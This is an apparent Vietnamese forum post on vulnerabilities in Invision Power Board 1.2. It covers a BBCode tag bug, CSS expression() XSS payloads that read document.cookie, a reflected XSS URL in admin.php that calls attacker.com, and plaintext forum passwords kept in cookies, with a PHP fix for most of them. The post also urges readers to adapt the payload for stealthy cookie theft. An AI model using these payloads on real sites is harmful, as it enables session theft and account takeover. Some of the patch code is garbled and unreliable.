IBF 1.2 mac loi xu ly cac the Tag dau vao va lam cho bai viet bi hien thi lech lac , Forum trong rat xau :
Code :
[IMG]http://[target]/some.gif[QUOTE]some.gif[/IMG][/QUOTE]
Hau het cac dien dan deu bi loi nay. Va ngoai the tren ban co the thay them the [EMAIL] cung bi mac loi nay, chu y la Hack cang nhieu MOD thi so the Tag cua ban lam loi nay xuat hien cang nhieu .
Fix :
Mo file : /sources/lib/post_parser.php
Tim dong 1214, sau đoan code kiem tra anh hãy thêm đoan code nay ngay sau do :
// Check if previous tag has left HTML inside this one
or if there's another tag in here (just in case) ~
Daniel Boland
if (preg_match( "/[\<\>\[\]]/", $url))
{
$this->error = 'Da Fix roi em a ? :D Hi Hi !
return $default;
}
II - Loi XSS o IBF 1.2 Final :
Ngoai loi XSS o the </textare>ma bác Venom đã Post bài trong Web Hacking thì IBF còn bi loi XSS sau, Nguy hiem hon va cung de de Exploit hon :D :
[FONT=expression(alert(document.cookie))]Testing :D[/FONT] The tiep theo bi loi nay :
<span style='font-family:expression(alert(document.cookie))'>Hay ko ha ? con them the nua bi loi day :)</span>
[COLOR=expression(alert(document.cookie))]Hi Hi ?[/COLOR]
Chua het dau nay :D :
<span style='color:expression(alert(document.cookie))'>Hello Neo !</span>
va nhu ban thay, ngay lap tuc tat ca nhung ai vao doc Topic thi doan Script alert(document.cookie) se duoc chay, sua di chut xiu va ban hay ap dung doan code nay de co the Stealth de lay cookie !
Chu y : expression() co the se la : expression([SCRIPT]) nhe :D
Fix :
Mo file sources/lib/post_parser.php roi tim đoan code sau :
while ( preg_match( "#\[font=([^\]]+)\](.*?)\[/font\]#ies", $txt ) )
{
$txt = preg_replace( "#\[font=([^\]]+)\](.*?)\[/font\]#ies" ,
"\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt );
}
while( preg_match( "#\[color=([^\]]+)\](.+?)\[/color\]#ies", $txt ) )
{
$txt = preg_replace( "#\[color=([^\]]+)\](.+?)\[/color\]#ies" ,
"\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt );
}
Thay bang đoan nay :
while ( preg_match( "#\[font=([^;<>\*\(\)\]\"']*)\](.*?)\[/font\]#ies", $txt
) )
{
$txt = preg_replace( "#\[font=([^;<>\*\(\)\"']*)\](.*?)\[/font\]#ies" ,
"\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt );
}
while( preg_match( "#\[color=([a-zA-Z0-9]*)\](.+?)\[/color\]#ies", $txt ) )
{
$txt = preg_replace( "#\[color=([a-zA-Z0-9]*)\](.+?)\[/color\]#ies" ,
"\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt );
}
Save lai roi Upload . Okie :D !
III - Invision Power Board Admin.PHP Cross-Site Scripting Vulnerability .
URL :
http://www.example.com/admin.php?adsess='><script>window.open(window.location.search.substring(78));</script><http://www.attacker.com?BoyBear$$$From$$$BinaryVision
Fix :
Mo file admin.php roi sau do them doan code sau :
$IN['AD_SESS'] = $HTTP_POST_VARS['adsess'] ? $HTTP_POST_VARS['adsess'] :
$HTTP_GET_VARS['adsess'];
To add this :
if (isset($IN['AD_SESS'])) {
$IN['AD_SESS'] = htmlspecialchars($IN['AD_SESS']);
}
ngoai ra tao them cac Pass bao ve ACP la giai phap dc day chu J !
IV – Loi Password Protect cho Forum .
IBF bao ve cac Forum bang mat khau nhung co mot loi rat nghiem trong la cac Password bao ve Forum nay deu o dang Text va ko dc ma hoa trong Cookie. Vi the chi can chom dc Cookie la biet Pass de dang nhap vao BOX dc bao ve do roi .
Fix : Chua co cach Fix, hay bao ve ban khi len Net, ra hang dung dich vu, khi ve nho xoa het Cookie, tham chi xoa ca History nua !
